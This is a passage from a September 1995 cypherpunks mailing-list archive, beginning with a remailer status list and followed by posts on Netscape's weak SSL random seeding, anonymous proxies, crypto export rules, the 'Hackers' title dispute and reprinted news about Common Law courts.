ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"c2"} = " eric pgp hash reord"; $remailer{"ideath"} = " cpunk hash ksub reord"; $remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord"; $remailer{"rahul"} = " cpunk pgp hash filter"; $remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord"; $remailer{"syrinx"} = " cpunk pgp hash cut reord mix post"; $remailer{"ford"} = " cpunk pgp hash ksub"; $remailer{"hroller"} = " cpunk pgp hash mix cut ek"; $remailer{"vishnu"} = " cpunk mix pgp hash latent cut ek ksub reord"; $remailer{"crown"} = " cpunk pgp hash latent cut mix ek reord"; $remailer{"robo"} = " cpunk hash mix"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"spook"} = " cpunk mix pgp hash latent cut ek reord"; $remailer{"gondolin"} = " cpunk mix hash latent cut ek ksub reord"; $remailer{"rmadillo"} = " mix cpunk pgp hash latent cut"; $remailer{"ncognito"} = " cpunk"; $remailer{"precip"} = " cpunk mix pgp hash latent cut ek reord"; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too. News: the remailer list has been rewritten, and the new version is live! It should be more accurate, reliable, and faster than before. Penet is back up! Enjoy. remailer email address history latency uptime ----------------------------------------------------------------------- ford remailer at bi-node.zerberus.de -**-**++*--* 1:29:00 100.00% crown mixmaster at kether.alias.net -----++--+++ 51:47 99.99% syrinx syrinx at c2.org +++-+++-++++ 41:46 99.99% hroller hroller at c2.org ******+##### 1:06 99.99% precip mixmaster at mix.precipice.com +-++-+.-- 6:12:30 99.98% bsu-cs nowhere at bsu-cs.bsu.edu ++*+--_**#+# 16:52 99.98% robo robo at c2.org ******+##*## 1:07 99.97% spook remailer at spook.alias.net ----------- 2:16:14 99.95% alumni hal at alumni.caltech.edu *** **+*+### 3:07 99.93% portal hfinney at shell.portal.com +* *** #+### 3:08 99.81% hacktic remailer at utopia.hacktic.nl ****** ++*** 10:42 99.68% rmadillo remailer at armadillo.com ++++++++++ + 39:26 99.57% replay remailer at replay.com ***** ++*** 7:28 99.55% flame remailer at flame.alias.net +*+++ ++*** 27:46 99.42% vishnu mixmaster at vishnu.alias.net --+*- +++-+ 1:36:19 99.29% mix mixmaster at remail.obscura.com ___.+--._. - 12:46:51 98.98% ideath remailer at ideath.goldenbear.com -----.----+ 5:04:07 98.43% extropia remail at extropia.wimsey.com -.---.----- 5:56:37 97.65% c2 remail at c2.org ++++** *+ * 27:40 96.11% penet * ++ 4:40:10 95.85% rahul homer at rahul.net ******+*#+## 2:18 99.99% ncognito ncognito at gate.net **+*+*-++ 6:59 68.25% gondolin mixmaster at gondolin.org ---.--*-- 3:11:17 67.07% History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From steven at echonyc.com Mon Sep 18 06:56:53 1995 From: steven at echonyc.com (Steven Levy) Date: Mon, 18 Sep 95 06:56:53 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: Message-ID: No chance. The problem for me isn't that someone wanted to call a movie Hackers but that it causes confusion in that for eleven years there has been a preexisiting work by that name. There is a novelization of the screenplay now in paperback, so when if a friend recommends that you buy Hackers, you'll probably buy that one. (especially since Dell is determined to do as little as possible for my own book). On Sun, 17 Sep 1995, Steve Bryan wrote: > At 8:36 pm 9/16/95, Steven Levy wrote: > > >>I saw "Hackers" yesterday. It's not bad and its political sensibility is > >>very cyberpunk. The ad campaign even uses the tag line, "Their only crime > >>is curiosity." > > > >It may not be a crime, but it's not nice to steal a title. > > I suppose this means that when "Hackers" comes out on video there's no point in looking for a cameo appeareance of the author of the identically named book? > > > From trei at process.com Mon Sep 18 07:12:45 1995 From: trei at process.com (Peter Trei) Date: Mon, 18 Sep 95 07:12:45 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: <9509181412.AA15673@toad.com> > >I saw "Hackers" yesterday. It's not bad and its political sensibility is > >very cyberpunk. The ad campaign even uses the tag line, "Their only crime > >is curiosity." > It may not be a crime, but it's not nice to steal a title. You mean, like you stole it from Dale Luck's (duck at mit oz) stage play of the same name? I saw this (in an Off-Off-Broadway production), years before your book came out. Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From frissell at panix.com Mon Sep 18 07:21:55 1995 From: frissell at panix.com (Duncan Frissell) Date: Mon, 18 Sep 95 07:21:55 PDT Subject: Linking = Showing = Transferring? Message-ID: <199509181421.KAA01808@panix.com> At 08:33 AM 9/15/95 -0700, Charles Lewton wrote: >Not quite squashed, Duncan. Bullet placement (poor by some standards) >is all that prevented Mr. Weaver from croaking like his unfortunate wife. >She is said to have "pissed off" the feds but was not charged with a >single actionable item yet she remains quite dead. > >Unless I have missed something somewhere, no TLA is concerned in the slightest >with individual liberty. That notion should keep a rational person awake >nights. > >Chuck > In response to Chuck and Lucky, I can only say that the Weavers suffered 57% casualties (4/7) and 28% KIA (2/7). The Feds suffered .25% KIA (1/400). I don't think any Feds were merely wounded. They brought murder charges against two members of the group and lost. They settled wrongful death suits for $3.1 million. They also lost the publicity war. They had to change their procedures because of Ruby Ridge and Waco. They energized the opposition. The casualties were unfortunate but when facing force ratios of 57/1 or better, the outcome has to be considered a major victory for Randy Weaver. The case is a demonstration of modern conflicts in which litigation and publicity count as much as guns. On that field, the Feds don't hold all the cards. DCF "The libertarian and conservative coalition of the 'Right' is a low-maintenance coalition because its members mostly want to be left alone while the special interest group coalition of the 'Left' is a high-maintenance coalition because all of its members need to be given a vast dose of government cash daily." From frissell at panix.com Mon Sep 18 07:23:07 1995 From: frissell at panix.com (Duncan Frissell) Date: Mon, 18 Sep 95 07:23:07 PDT Subject: Anonymous WWW proxy Alpha release available Message-ID: <199509181421.KAA01875@panix.com> Thanks. What we now need is a proxy located in the US with good connections for performance. Does anyone know a good test page that reads back the info your browser is putting out so you can test proxies? DCF From frissell at panix.com Mon Sep 18 07:27:17 1995 From: frissell at panix.com (Duncan Frissell) Date: Mon, 18 Sep 95 07:27:17 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: <199509181426.KAA03412@panix.com> At 10:16 AM 9/18/95 -6, Peter Trei wrote: >> It may not be a crime, but it's not nice to steal a title. > >You mean, like you stole it from Dale Luck's (duck at mit oz) stage play of the same name? >I saw this (in an Off-Off-Broadway production), years before your book came >out. Steven knows titles can't be copyrighted. He was just expressing the wish that they had come up with their own title. I'm pissed because the sequel to Jurassic Park is stealing the title of Sir Arthur Conan Doyle's dinosaur novel "Lost World." Unfortunately, title-space is more limited than book-space. DCF From anonymous at robo.remailer Mon Sep 18 07:30:57 1995 From: anonymous at robo.remailer (anonymous at robo.remailer) Date: Mon, 18 Sep 95 07:30:57 PDT Subject: Code of Law Message-ID: <199509181425.HAA13003@infinity.c2.org> Financial Times, Sept 18, 1995. Code to deny the money launderer The International Bar Association will this week call for the establishment of a code of practice for lawyers worldwide to deny criminals access to legal services which facilitate money laundering. At the IBA's business law conference in Paris, which opens today, Professor Ross Harper, IBA president, will ask representatives from 167 bar associations to pass a motion supporting efforts to counter money laundering and for the creation of common professional standards on the issue. "We are anxious that there be no safe havens for the ill-gotten proceeds of criminal activities throughout the world," he said yesterday. Estimates put the amount of money laundered worldwide each year at more than 500 billion pounds. On such a scale it is possible for economies, world trade and global banking to be subverted by organised crime, the IBA says. The motion urges member bar associations to press their national governments to adopt the principal recommendations of the Financial Action Task Force on money laundering set up in 1989 by the Group of Seven industrialised countries and the European Commission. Robert Rice, London ----- Newsweek, Sept 25, 1995. A Law of Their Own: Extremists create do-it-yourself courts. One day last month Wichita District Attorney Nola Foulston looked at her copy of the Daily Record, a trade newspaper, and was stunned to read that she had been subpoenaed. She was ordered to appear in District Court and produce her license to practice law. If she failed to appear, the sheriff would be directed to arrest her. Her alleged crime: holding public office. The subpoena was an unofficial document drafted and filed by a local man who had been charged with a misdemeanor for burning trash without a permit. Angered by the government interference, he joined a growing number of disgruntled Americans who think they've found a better arbiter ofjustice. He went to a "Common Law court, " one of the latest incarnations of the extremist right. Foulston ignored the subpoena. "I don't practice in false courts," she says. But they're growing. Common Law courts have sprung up in at least 11 states in the farm belt and the West over the last year, organized by a cross section of people bent on directly challenging government. In living rooms, bingo halls and convention centers, dozens gather weekly to form juries, present evidence and issue kangaroo-court indictments, liens, arrest warrants -- and even death sentences. None of this has the force of law. The movement is based on a mixture of crackpot conspiracy theories and bizarre interpretations of the U. S. Constitution, the Bible and the Magna Charta. In brief, its leaders preach that Franklin Delano Roosevelt's "bank holiday" edict of 1933, which temporarily shut down the nation's banks, stripped the country of its safeguards against tyranny. "When you get to digging into what's going on today, you have a government operating outside the Constitution," says David Schechter, a court organizer. Court members keep in touch on the Internet, swapping information, posting meetings and organizing court sessions . They also vent their views in a Texas magazine called the AntiShyster. Mostly white men form Common Law courts; many come from the militia movement. Some are closely aligned with white-supremacy and anti-Jewish groups. "The basic idea behind the movement," says University of Oregon history professor Richard Brown, "is 'popular sovereignty,' that people are above the law. These people are alienated from the legal system. To some extent it sounds like they're also trying to settle personal scores." Nuisance filings: At times, the movement spills out of its bogus courts and into real ones. Followers have tied up courts and IRS offices with thousands of pages of nuisance filings. Common Law court "marshals" have even burst into federal courtrooms wearing official-looking badges and uniforms to serve their papers. Last year in Garfield County, Mont., 36 men and women formed a Common Law court and briefly occupied a courthouse. Another court offered $1 million bounties for the arrest of local officials and threatened to hang them. Garfield County Attorney Nick Murnion charged some members of the Common Law court with "criminal syndicalism," alleging that the group had advocated acts of violence for political purposes. One court member was sentenced to 10 years in prison. Others received smaller sentences. Some members try to use the rump courts to reverse real ones. Favorite targets are divorce decrees and foreclosure notices. "People who don't want to or can't pay their bills are turning to something that tells them they don't have to." says Kansas City attorney Berry F. Laws III, who has been targeted by Common Law courts because he forecloses on farm mortgages for the Farmers Home Administration. This is a serious business, but it has elements of unintended burlesque. William Ellwood of Columbus. Ohio, joined up after his small business collapsed and he found that he still owed the Internal Revenue Service $5,100. Frustrated and annoyed, he took to researching the Constitution and concluded that he was living in a land that infringed on his personal liberty. One thing led to another until he found himself ticketed by a police officer for weaving on a highway. His reading of the Constitution made the ticket null and void. "What we're saying," he patiently explains, "is the motor-vehicle laws are laws of commerce. I don't use the laws for private gain, so why do I have to be stopped?" Ellwood eventually paid the ticket, but not before he and a small group of like-minded citizens reached out to organizer Schechter. Now they meet every Tuesday to have their day in a court of their own making. Thomas Heath in Denver and Connie Leslie ----- From norm at netcom.com Mon Sep 18 07:54:40 1995 From: norm at netcom.com (Norman Hardy) Date: Mon, 18 Sep 95 07:54:40 PDT Subject: Netscape SSL implementation is broken! Message-ID: At 9:29 PM 9/17/95, Perry E. Metzger wrote: >Christian Wettergren writes: >> I guess we should send them the draft-ietf-security-randomness-00.txt >> asap. > >I thought that was an RFC by now. > >Perry It is! RFC 1750. From adam at homeport.org Mon Sep 18 08:10:04 1995 From: adam at homeport.org (Adam Shostack) Date: Mon, 18 Sep 95 08:10:04 PDT Subject: Good random seeds Message-ID: <199509181510.LAA01802@homeport.org> Since we can all see how badly time works, I'd like to point out that Will Price, author of the excellent Cryptdisk utility for the Mac, uses mouse movements to seed his PRNG. His code is available for a small fee, and I'd strongly suggest that people who need good, easy PRNs take a look at it, and also take a long look at RFC1750, randomness reccomendations for security (or something like that.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume "It is seldom that liberty of any kind is lost all at once." -Hume From dl at hplyot.obspm.fr Mon Sep 18 08:15:16 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Mon, 18 Sep 95 08:15:16 PDT Subject: Anonymous WWW proxy Alpha release available In-Reply-To: <199509181421.KAA01875@panix.com> Message-ID: <9509181514.AA16343@hplyot.obspm.fr> Duncan Frissell writes: > Thanks. What we now need is a proxy located in the US with good connections > for performance. yes ! yes ! anyone with tcl-dp and tclX installed to run one ? we need to have a 'network' of proxies ! [maybe I shall 'translate' the prototype in perl or C... but I'm much more used to Tcl than Perl, and Tcl writting is infintly faster than C for web tasks] > Does anyone know a good test page that reads back the info > your browser is putting out so you can test proxies? http://hplyot.obspm.fr:8001/ shows what has been sent to it by the browser (between other www goodies) [You can put the following ---8<--- #! /bin/sh echo "Content-type: text/plain" echo "" /bin/env ---8<--- as a minimal debugging cgi too, on any httpd, if you want] regards dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept From hallam at w3.org Mon Sep 18 08:35:49 1995 From: hallam at w3.org (hallam at w3.org) Date: Mon, 18 Sep 95 08:35:49 PDT Subject: Code of Law In-Reply-To: <199509181425.HAA13003@infinity.c2.org> Message-ID: <9509181534.AA10941@zorch.w3.org> >Another >court offered $1 million bounties for the arrest of local >officials and threatened to hang them. Garfield County >Attorney Nick Murnion charged some members of the Common >Law court with "criminal syndicalism," alleging that the >group had advocated acts of violence for political >purposes. One court member was sentenced to 10 years in >prison. Others received smaller sentences. This sort of thing can become very dangerous very quickly. In the UK there was a publicity seeking shyster who decided to make a political career out of attacking a book he didn't like. The authorities didn't want to risk getting involved so they let the guy go round calling for the author to be murdered. He has been in hiding since the Ayatoloah issued a death threat. >"The basic idea behind the movement," says >University of Oregon history professor Richard Brown, "is >'popular sovereignty,' that people are above the law. >These people are alienated from the legal system. To some >extent it sounds like they're also trying to settle >personal scores." Sounds like they don't like the democracy so they are setting up their own lynch law. It dosen't sound all that different from fascism. First they start saying that a group of people are evil, once they have convinced each other that this is the case they take the logical next step of murdering them. Another reason why we need cryptography, to protect ourseles against such self appointed lynch mobs. Phill H-B From rsalz at osf.org Mon Sep 18 09:23:10 1995 From: rsalz at osf.org (Rich Salz) Date: Mon, 18 Sep 95 09:23:10 PDT Subject: Netscape's random numbers Message-ID: <9509181622.AA15284@sulphur.osf.org> Congrats, nice job! The Netscape license explicitly prohibits decompiling (except where such prohibition is illegal). When this hits the media it will be important to avoid being tarred with the "hacker breaks rules and breaks in" brush. More subtly, it's probably a bad idea to call into question the overall business model of client binaries on the net. Instead, emphasize importance of open code, public reviews, ability to link in your own code that meets public specs, etc. All of these things the Internet was designed to do, and U.S. ITAR regulations are designed to prohibit (globally, anyway). And also that the bad guys will never play by the rules. And re-emphasize that solutions are possible, just that the U.S. government prevents them from being deployed in a global economy. Perhaps draw parallels to the recent Microsoft Word virus. /r$ From tbyfield at panix.com Mon Sep 18 09:28:13 1995 From: tbyfield at panix.com (t byfield) Date: Mon, 18 Sep 95 09:28:13 PDT Subject: Joe Sixpack and his TV Message-ID: At 9:20 PM 9/17/95, Black Unicorn wrote: >As I understand it shows like "The X-Files" don't accept unsolicited >scripts. Not surprising as I'm sure they have writer's agreements. And, given how popular the show is, I doubt their *writers* even accept unsolicited *phone calls*. In principle, the idea of working on positive media exposure is a good one; in practice, it'll likely be mostly dangerous, since there's no way to guarantee a pro-crypto slant when anticrypto slants will widely be seen as making for better "drama." Any number of soap writers would bite a crypto hook if someone took the time to contact them--except on shows like that secrets are *bad* (e.g., So-and-so is suspected of Murdering Whoever for Financial Reasons, but refuses to give up the Password to his Encrypted Files, so Some Chick Seduces him and slips an Invisible Keystroke Capture Program, written by her Little Hacker Brother, onto his computer to Reveal the Ugly Truth). The news programs won't be much better, since reporters, being a suspicious lot, tend to dislike secrets too. Maybe try the Simpsons, hey? I see it all now: Bart encrypts Homer and forgets the password. As far as the family's concerned, the blob of random friction that sits around watching TV and drinking beer is fine, but Homer's boss starts to worry that Home's looking a bit unkempt... ted From steven at echonyc.com Mon Sep 18 09:29:15 1995 From: steven at echonyc.com (Steven Levy) Date: Mon, 18 Sep 95 09:29:15 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: <199509181408.KAA02406@echonyc.com> Message-ID: It's my impression that the play was staged a few years after my book came out in 1984 (though I chose the title in 1982). I remember reading the reviews then, and they didn't seem to mention that it was a revivial of a years-old play whose name I had unintentially used for my own book. (Unlike the case for the current movie, whose screenwriter seemed to know of my own book.) If you have evidence that the play was indeed produced before 1984, please let me know. Otherwise, I'd be happy to accept your apology, Peter. On Mon, 18 Sep 1995, Peter Trei wrote: > > > >I saw "Hackers" yesterday. It's not bad and its political sensibility is > > >very cyberpunk. The ad campaign even uses the tag line, "Their only crime > > >is curiosity." > > > It may not be a crime, but it's not nice to steal a title. > > You mean, like you stole it from Dale Luck's (duck at mit oz) stage play of the same name? > I saw this (in an Off-Off-Broadway production), years before your book came > out. > > > > > Peter Trei > Senior Software Engineer > Purveyor Development Team > Process Software Corporation > http://www.process.com > trei at process.com > From jgrubs at left.webcasters.com Mon Sep 18 09:29:26 1995 From: jgrubs at left.webcasters.com (Jim Grubs W8GRT) Date: Mon, 18 Sep 95 09:29:26 PDT Subject: "alt.cypherpunks" Newsgroup vs. Mailing List? Message-ID: hallam at w3.org writes: > > >Should there be an "alt.cypherpunks" type of newsgroup instead of this > >mailing list? > > Bad idea, it would simply mean that every kook on USEnet would add > alt.cypherpunks onto the crossposting line. We would have black helicopters, > loons, Waco Wako's, Loonytarians and turkish government propaganda spamming > forever. Hey, create the alt. group and let it draw the kooks. Nobody said WE have to read it. We can stay here as usual... -- WebCasters(tm) James C. Grubs jgrubs at left.webcasters.com 6817 Maplewood Avenue Tel.: 419-882-2697 Sylvania, Oh 43560 Fax: 419-885-2814 Internet consulting, HTML programming, Information brokering From unicorn at polaris.mindport.net Mon Sep 18 09:47:11 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Mon, 18 Sep 95 09:47:11 PDT Subject: Linking = Showing = Transferring? In-Reply-To: <199509181421.KAA01808@panix.com> Message-ID: On Mon, 18 Sep 1995, Duncan Frissell wrote: > At 08:33 AM 9/15/95 -0700, Charles Lewton wrote: > > >Not quite squashed, Duncan. Bullet placement (poor by some standards) > >is all that prevented Mr. Weaver from croaking like his unfortunate wife. > >She is said to have "pissed off" the feds but was not charged with a > >single actionable item yet she remains quite dead. > > > >Unless I have missed something somewhere, no TLA is concerned in the slightest > >with individual liberty. That notion should keep a rational person awake > >nights. > > > >Chuck > > > > In response to Chuck and Lucky, I can only say that the Weavers suffered 57% > casualties (4/7) and 28% KIA (2/7). The Feds suffered .25% KIA (1/400). I > don't think any Feds were merely wounded. > > They brought murder charges against two members of the group and lost. Careful here, they lost because the FBI refused to cooperate with the prosecutor. It was looking like a open and shut case before this. > They settled wrongful death suits for $3.1 million. They also lost > the publicity war. They had to change their procedures because of Ruby > Ridge and Waco. Actually, they just reenforced the old policy, which had been degrading in practice for quite a long while in the case of Ruby Ridge. > They energized the opposition. > > The casualties were unfortunate but when facing force ratios of 57/1 or > better, the outcome has to be considered a major victory for Randy Weaver. Considering the limited rules of engagement (i.e. low intensity sniper conflict only) I don't think you can really take 57/1 as a force ratio of meaningful impact. > The case is a demonstration of modern conflicts in which litigation and > publicity count as much as guns. On that field, the Feds don't hold all the > cards. On this I agree with you. > > DCF > > "The libertarian and conservative coalition of the 'Right' is a > low-maintenance coalition because its members mostly want to be left alone > while the special interest group coalition of the 'Left' is a > high-maintenance coalition because all of its members need to be given a > vast dose of government cash daily." > > > --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From perry at piermont.com Mon Sep 18 09:51:36 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 18 Sep 95 09:51:36 PDT Subject: Netscape Navigator 2.0 will implement secure e-mail In-Reply-To: Message-ID: <199509181651.MAA00479@frankenstein.piermont.com> Eric Young writes: > On 18 Sep 1995, Jeff Weinstein wrote: > > The implementation guide recommends using rc2-cbc 40-bit for content > > encryption when there is no way to determine the capabilities of the > > recipient. When you do know what the recipient can do, it recommends > > using RC2-CBC with a longer key or DES-CBC. > > Hmm.... notice the use of a non public cipher as the base cipher.... > what a shame.... Its also a shame that they aren't sticking to MOSS, which is the open IETF standard for such stuff. Perry From sameer at c2.org Mon Sep 18 09:58:40 1995 From: sameer at c2.org (sameer) Date: Mon, 18 Sep 95 09:58:40 PDT Subject: Netscape SSL implementation cracked! In-Reply-To: <199509180527.BAA28782@frankenstein.piermont.com> Message-ID: <199509181652.JAA23706@infinity.c2.org> > > Anyway, congratulations to you and Dave on an excellent piece of > work. I say a bunch of us should buy you "I broke Netscape's security > and all I got was this lousy T-Shirt" shirts, if only someone would > design them! > If someone would design them (i'll see if my graphic designer is up to the task, but he's on vacation right now), Community ConneXion will make/fund them. -- sameer Voice: 510-601-9777 Network Administrator FAX: 510-601-9734 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From danisch at ira.uka.de Mon Sep 18 09:58:44 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Mon, 18 Sep 95 09:58:44 PDT Subject: Explaining Zero Knowledge to your children Message-ID: <9509181655.AA06115@elysion.iaks.ira.uka.de> > Clever, but I think it's missing an important element of zero knowledge > interactive proof systems. For example, why not simply open _both_ hands? That's the same problem as with the cave: Why not just go into the left passage and come out of the right passage. Both are absolute proofs. If you have two identical bills you must be able to copy them. In a cryptographical proof there is always the chance to guess. The chance is sometimes 50%, sometimes very small. What about this idea: Alice is caught in a dark room somewhere on the world. She doesn't know where she is, but there is a telephone in the room and she calls Bob to ask him where she is. Bob claims to know it but doesn't want to reveal. He calls her back. When the phone is ringing, he has proven the knowledge of her phone number, but she still doesn't know where she is or how he could know. And there is still the chance that Bob has guessed the number. Mmmh, Hadmut From trei at process.com Mon Sep 18 10:00:05 1995 From: trei at process.com (Peter Trei) Date: Mon, 18 Sep 95 10:00:05 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: <9509181659.AA22457@toad.com> > It's my impression that the play was staged a few years after my book > came out in 1984 (though I chose the title in 1982). I remember reading > the reviews then, and they didn't > seem to mention that it was a revivial of a years-old play whose name I had > unintentially used for my own book. (Unlike the case for the current > movie, whose screenwriter seemed to know of my own book.) If > you have evidence that the play was indeed produced before 1984, please > let me know. Otherwise, I'd be happy to accept your apology, Peter. > > On Mon, 18 Sep 1995, Peter Trei wrote: > > > >I saw "Hackers" yesterday. It's not bad and its political sensibility is > > > >very cyberpunk. The ad campaign even uses the tag line, "Their only crime > > > >is curiosity." > > > It may not be a crime, but it's not nice to steal a title. > > You mean, like you stole it from Dale Luck's (duck at mit oz) stage play of the same name? > > I saw this (in an Off-Off-Broadway production), years before your book came > > out. If I'm wrong (and I would not be suprised - I'm relying on fuzzy memories here), please consider my abject apology tendered. Namespace collisions seem to happen quite frequently in titles. I can remember when TMC made a big deal out their intention to air 'Brainstorm", the 1983 film with Natalie Wood. I settled down to watch, and up came a black and white movie with a totally different plot - it turned out they had been sent the 1965 film of that name, and no one had checked. Looking in the (ex)Cardiff film database, I note that there is now a 3rd movie of the title (1994). A couple weeks ago my daughter was making a big deal about wanting to watch 'The Red Shoes" on Disney. I was thinking of the 1948 ballet movie, and told her I didn't think she'd like it. She insisted, and it turned out to be a 30 minute (and charming in cloying sort of way) cartoon. Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From rsalz at osf.org Mon Sep 18 10:12:30 1995 From: rsalz at osf.org (Rich Salz) Date: Mon, 18 Sep 95 10:12:30 PDT Subject: ftp://www.brooks.af.mil/pub/unix/utils/des.tar Message-ID: <9509181711.AA15476@sulphur.osf.org> This seems to be /* Sofware DES functions * written 12 Dec 1986 by Phil Karn, KA9Q; large sections adapted from * the 1977 public-domain program by Jim Gillogly * Modified for additional speed - 6 December 1988 Phil Karn * Modified for parameterized key schedules - Jan 1991 Phil Karn Would someone from outside the US try to download the above file? It would be, at least, amusing if an Air Force site were in violation of the ITAR (their README notwithstanding). /r$ From goedel at tezcat.com Mon Sep 18 10:32:48 1995 From: goedel at tezcat.com (Dietrich J. Kappe) Date: Mon, 18 Sep 95 10:32:48 PDT Subject: Netscape's random numbers Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >Congrats, nice job! Yes, well done. >The Netscape license explicitly prohibits decompiling (except where such >prohibition is illegal). When this hits the media it will be important >to avoid being tarred with the "hacker breaks rules and breaks in" brush. >More subtly, it's probably a bad idea to call into question the overall >business model of client binaries on the net. > >Instead, emphasize importance of open code, public reviews, ability to >link in your own code that meets public specs, etc. All of these things >the Internet was designed to do, and U.S. ITAR regulations are designed >to prohibit (globally, anyway). And also that the bad guys will never >play by the rules. And re-emphasize that solutions are possible, just >that the U.S. government prevents them from being deployed in a global >economy. Before we go to the news, perhaps we should demonstrate the exploitation of this hole. It would certainly make selling this story a whole lot easier. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBgAwUBMF27PHIf3YegbdiBAQGI7AJXY5d2Su52MWXrh6tP20vOai/Rsbd6+oqx urWUP34wPv5dqMv1Mw6XDlstX5Q3KmOMeTOjAwcjuJXY5Z3RhkL0gi0nMBUS/IdZ b/GN =vhHo -----END PGP SIGNATURE----- Dietrich Kappe | Red Planet http://www.redweb.com Red Planet, LLC| "Chess Space" | "MS Access Products" | PGP Public Key 1-800-RED 0 WEB| /chess | /cobre | /goedel/key.txt Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84 From jim at acm.org Mon Sep 18 10:48:58 1995 From: jim at acm.org (Jim Gillogly) Date: Mon, 18 Sep 95 10:48:58 PDT Subject: ftp://www.brooks.af.mil/pub/unix/utils/des.tar In-Reply-To: <9509181711.AA15476@sulphur.osf.org> Message-ID: <199509181748.KAA17616@mycroft.rand.org> > Rich Salz writes: > > This seems to be > /* Sofware DES functions > * written 12 Dec 1986 by Phil Karn, KA9Q; large sections adapted from > * the 1977 public-domain program by Jim Gillogly > * Modified for additional speed - 6 December 1988 Phil Karn > * Modified for parameterized key schedules - Jan 1991 Phil Karn > Would someone from outside the US try to download the above file? > It would be, at least, amusing if an Air Force site were in violation > of the ITAR (their README notwithstanding). Hurm -- if Phil Karn and I knowingly allow it to remain there, that puts us in the same position as Phil Zimmermann, right? Oh -- except that our offenses may already be beyond the statute of limitations. Jim Gillogly Trewesday, 27 Halimath S.R. 1995, 17:48 From koontz at MasPar.COM Mon Sep 18 10:56:50 1995 From: koontz at MasPar.COM (David G. Koontz) Date: Mon, 18 Sep 95 10:56:50 PDT Subject: Intellectual Property and Crypto collision Message-ID: <9509181801.AA06230@argosy.MasPar.COM> >> ELECTRONIC MEDIA PROTECTED UNDER COPYRIGHT LAW >> A presidential task force has recommended that electronic transmission of >> books, magazine articles and software should be classified as copies >> subject to existing copyright laws. The task force also recommended that >> it should be illegal to make or distribute products aimed at decoding > encrypted software without the consent of the copyright owner. >Would this make it illegal to produce tools for decrypting key-escrowed >software? :-) More importantly, would this firmly extend first amendment protection to electronicly transmitted forms? From cwe at Csli.Stanford.EDU Mon Sep 18 11:23:52 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Mon, 18 Sep 95 11:23:52 PDT Subject: Netscape SSL implementation is broken! In-Reply-To: Message-ID: <199509181823.LAA00950@Csli.Stanford.EDU> | At 9:29 PM 9/17/95, Perry E. Metzger wrote: | >Christian Wettergren writes: | >> I guess we should send them the draft-ietf-security-randomness-00.txt | >> asap. | > | >I thought that was an RFC by now. | > | >Perry | It is! RFC 1750. I should have known, since it was a draft years ago. Ok, you Netscape people, go read RFC 1750! :-) Btw, I guess my asadi program is full of holes and bugs. Where is a decent 'randomness generator' for a SunOS system? /Christian From cwe at Csli.Stanford.EDU Mon Sep 18 11:37:55 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Mon, 18 Sep 95 11:37:55 PDT Subject: Code of Law In-Reply-To: <9509181534.AA10941@zorch.w3.org> Message-ID: <199509181837.LAA01709@Csli.Stanford.EDU> | >"The basic idea behind the movement," says | >University of Oregon history professor Richard Brown, "is | >'popular sovereignty,' that people are above the law. | >These people are alienated from the legal system. To some | >extent it sounds like they're also trying to settle | >personal scores." I suddenly got very cold. I thinnk the world has seen enough of 